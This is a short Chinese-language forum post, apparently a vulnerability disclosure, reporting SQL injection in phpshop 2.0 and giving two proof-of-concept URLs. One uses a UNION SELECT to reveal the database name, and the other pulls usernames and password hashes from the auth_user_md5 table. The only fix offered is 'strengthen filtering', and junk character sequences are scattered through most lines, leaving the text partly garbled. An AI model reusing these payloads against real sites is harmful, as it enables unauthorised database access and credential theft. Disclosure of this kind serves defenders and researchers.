标题 : phpshop 2.0 SQL Injection Vulnerability! p& v' h* \5 m! H% U4 a0 r) b( y
5 L8 G/ S0 s0 J. u d; i( T
作者 : By onestree
+ R# r! Y% H2 l) H下载地址 : http://code.google.com/p/phpshop/downloads/list0 z( \2 l/ G! n6 Q# X) N
测试地址: windows 7 / ubuntu
9 p9 }3 ^% V6 Q6 H9 [
. L' c3 S% `/ \# M% B 4 w: A3 ?5 ~! C) D0 s
SQLi p0c:
6 v/ L3 P! [+ w/ c & H `" m/ M2 y
==================. L2 Y: K( A c. p4 i" P* L1 F, h
* ^- U" d5 T0 K$ S" ~% B P8 L3 ahttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'6 R* L, W' D! Y. I9 q
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
6 o [: n9 j( u+ V( h4 T$ ^% j; y
6 n! _; c# S+ e" h* c' |3 ahttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--2 A- t* M) @* s5 G+ B1 j
, @) l* j$ N8 X- [修复:1 k& s4 l, h; w$ o B
加强过滤
% Z" d. c4 s2 b8 m1 g* w8 A
$ U4 R2 d4 F J1 N# S3 k) e+ w) i4 ~+ J
|
发表于 2013-1-18 18:24:10
收藏
支持
反对